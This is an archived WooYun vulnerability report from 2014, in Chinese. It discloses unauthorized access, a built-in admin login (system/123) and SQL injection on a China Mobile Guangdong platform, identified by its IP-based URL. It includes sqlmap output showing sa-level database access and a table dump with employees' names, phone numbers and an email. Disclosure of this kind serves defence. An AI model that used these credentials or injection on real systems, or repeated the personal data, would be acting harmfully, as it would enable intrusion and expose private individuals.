当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075395

漏洞标题:中国移动终端公司广东分公司某平台系统存在内置管理弱口令(SQL注入、未授权访问)漏洞

相关厂商:中国移动

漏洞作者: cf_hb

提交时间:2014-09-07 22:18

修复时间:2014-10-22 22:20

公开时间:2014-10-22 22:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-07: 细节已通知厂商并且等待厂商处理中
2014-09-12: 厂商已经确认,细节仅向厂商公开
2014-09-22: 细节向核心白帽子及相关领域专家公开
2014-10-02: 细节向普通白帽子公开
2014-10-12: 细节向实习白帽子公开
2014-10-22: 细节向公众公开

简要描述:

系统内置管理员账号弱口令,后台目录遍历漏洞,以及SQL注射高危漏洞

详细说明:

厂商版权:中国移动终端公司广东分公司
平台名称:协作共享平台
URL:http://221.179.6.108:8004/Login.aspx
有图有真像:

LoginIndex.PNG


漏洞一:未授权访问

NoRight.PNG


Noright2.PNG


system.jpg


漏洞二:存在内置系统管理账号:system 密码:123

backindex.PNG


可以看到很多敏感信息:
包括移动的合同编号,合同签约资金,移动内部用户电话,部门,内部一些事务的操作流程等等。(被600万的大巴车租用额度惊呆了!移动真有钱!)

cars.PNG


liucheng.PNG


liucheng1.PNG


合同.PNG


漏洞三: SQL注射高危漏洞

sql点.PNG


参数:txtName 没有做过滤 导致sql注入,下面注入证明:
sqlmap注入得到数据库:
[*] FCT_DB
[*] GMCCTerminal
[*] GMCCTerminal_app
[*] master
[*] model
[*] msdb
[*] Platform
[*] QASupervision
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
当前用户
[20:09:59] [INFO] fetching current user
current user: 'sa'
当前数据库:
[20:10:02] [INFO] fetching current database
current database: 'GMCCTerminal'
当前数据库有215个表,列举了一部分:
[20:10:55] [INFO] fetching tables for database: GMCCTerminal
[20:11:00] [INFO] the SQL query used returns 215 entries
[20:11:00] [INFO] starting 10 threads
[20:11:03] [INFO] retrieved: "dbo.AccountingPackageRules"
[20:11:03] [INFO] retrieved: "dbo.aspnet_Profile"
[20:11:04] [INFO] retrieved: "dbo.aspnet_PersonalizationPerUser"
[20:11:04] [INFO] retrieved: "dbo.aspnet_PersonalizationAllUsers"
[20:11:04] [INFO] retrieved: "dbo.AreaInfo"
[20:11:04] [INFO] retrieved: "dbo.aspnet_Membership"
[20:11:05] [INFO] retrieved: "dbo.aspnet_Applications"
[20:11:05] [INFO] retrieved: "dbo.A_Temp_Users$"
[20:11:05] [INFO] retrieved: "dbo.AccountingPackageRuleDetails"
[20:11:05] [INFO] retrieved: "dbo.aspnet_Paths"
[20:11:07] [INFO] retrieved: "dbo.aspnet_WebEvent_Events"
[20:11:07] [INFO] retrieved: "dbo.aspnet_Users"
[20:11:07] [INFO] retrieved: "dbo.aspnet_Roles"
[20:11:07] [INFO] retrieved: "dbo.BBSBoardType"
[20:11:08] [INFO] retrieved: "dbo.AuditTypes"
[20:11:08] [INFO] retrieved: "dbo.BatchConfig"
[20:11:08] [INFO] retrieved: "dbo.BBSReply"
[20:11:09] [INFO] retrieved: "dbo.BBSInfo"
[20:11:09] [INFO] retrieved: "dbo.aspnet_UsersInRoles"
[20:11:09] [INFO] retrieved: "dbo.aspnet_SchemaVersions"
[20:11:10] [INFO] retrieved: "dbo.ChildFlowInfo"
[20:11:11] [INFO] retrieved: "dbo.Contract"
[20:11:11] [INFO] retrieved: "dbo.Car"
[20:11:12] [INFO] retrieved: "dbo.Card"
[20:11:12] [INFO] retrieved: "dbo.CardApplyList"
[20:11:13] [INFO] retrieved: "dbo.CompanyUser"
[20:11:13] [INFO] retrieved: "dbo.CityInfo"
[20:11:14] [INFO] retrieved: "dbo.ContractLend"
[20:11:14] [INFO] retrieved: "dbo.ContractType"
[20:11:14] [INFO] retrieved: "dbo.Company"
[20:11:14] [INFO] retrieved: "dbo.DELETE_OU_USERS"
[20:11:15] [INFO] retrieved: "dbo.ContractTemplate"
[20:11:15] [INFO] retrieved: "dbo.DELETE_TABLE_USERS"
[20:11:16] [INFO] retrieved: "dbo.delete_temp_temp_user"
[20:11:16] [INFO] retrieved: "dbo.DELETE_USERS"
[20:11:16] [INFO] retrieved: "dbo.dfsdl"
[20:11:17] [INFO] retrieved: "dbo.EPSP_ContractApprovalLegBack"
[20:11:17] [INFO] retrieved: "dbo.EPSP_ProcureOtherLong"
[20:11:18] [INFO] retrieved: "dbo.EPSP_ContractPurchase"
[20:11:18] [INFO] retrieved: "dbo.EPSP_ProcureRequireLong"
[20:11:18] [INFO] retrieved: "dbo.EPSP_ProjectPurchase"
[20:11:19] [INFO] retrieved: "dbo.DELETE_TEMP_OU_USERS"
[20:11:19] [INFO] retrieved: "dbo.EPSP_ContractApprovalLong"
[20:11:19] [INFO] retrieved: "dbo.EPSP_PurchaseMode"
[20:11:19] [INFO] retrieved: "dbo.DoorCard"
[20:11:19] [INFO] retrieved: "dbo.EPSP_PurchaseObjectCatagory"
[20:11:20] [INFO] retrieved: "dbo.EPSP_ContractApprovalDeptBack"
[20:11:21] [INFO] retrieved: "dbo.EX_ExpressApply"
[20:11:21] [INFO] retrieved: "dbo.EX_ExpressBudgetDept"
[20:11:22] [INFO] retrieved: "dbo.EX_ExpressBudgetYear"
读了一个表的数据:
Database: GMCCTerminal
Table: dbo.CompanyUser
[2 entries]
+--------------+--------------------------------------+-------------+-----------
---------------+--------+-----------+-------------+--------------------+
| LoginID | CompanyID | Phone | Email
| ISUsed | UserName | LastModUser | LastModTime |
+--------------+--------------------------------------+-------------+-----------
---------------+--------+-----------+-------------+--------------------+
| huangwenjing | 3a98599a-007a-4118-8bb5-0245c35fd7ad | 13925095129 | huang.wenj
ing@zte.com.cn | 1 | ??? | guomengxing | 10 26 2012 11:44AM |
| jiangfeiyan | 03de712c-2ac7-41ec-a39d-6d45c625e066 | 18718882779 | <blank>
| 1 | ???(????) | zhangyanan | 12 13 2012 4:48PM |
+--------------+--------------------------------------+-------------+-----------
---------------+--------+-----------+-------------+--------------------+
测试就发现有这些问题了,望

漏洞证明:

请见上面!

修复方案:

1. 严格过滤输入参数
2. 严格设置目录权限
3. 修改内置管理账号system的弱口令!

版权声明:转载请注明来源 cf_hb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-12 16:43

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国移动集团公司处置,由其后续协调省公司。

最新状态:

暂无